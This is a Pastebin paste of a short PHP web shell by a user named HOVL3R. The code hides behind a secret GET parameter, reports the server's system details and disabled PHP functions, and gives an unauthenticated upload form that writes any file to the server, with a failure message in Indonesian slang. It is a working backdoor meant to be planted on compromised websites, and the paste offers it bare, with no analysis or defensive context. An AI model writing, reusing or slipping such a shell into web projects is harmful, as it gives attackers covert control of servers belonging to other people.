Advertisement
HOVL3R

Untitled

Apr 24th, 2019
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.52 KB | None | 0 0
  1. <?php if(isset($_GET["X-HOVL3R-nyumput"]))
  2. {
  3. echo"<font color=#ffffff>".php_uname()."";
  4. print "\n";$disable_functions = @ini_get("disable_functions");
  5. echo "<br>DisablePHP=".$disable_functions; print "\n";
  6. echo"<br><form method=post enctype=multipart/form-data>";
  7. echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>";
  8. if($_POST["k"]==upload)
  9. { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  10. echo"<b>".$_FILES["f"]["name"];
  11. }else{
  12. echo"<b>Gagal upload Brayy";
  13. }
  14. }
  15. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement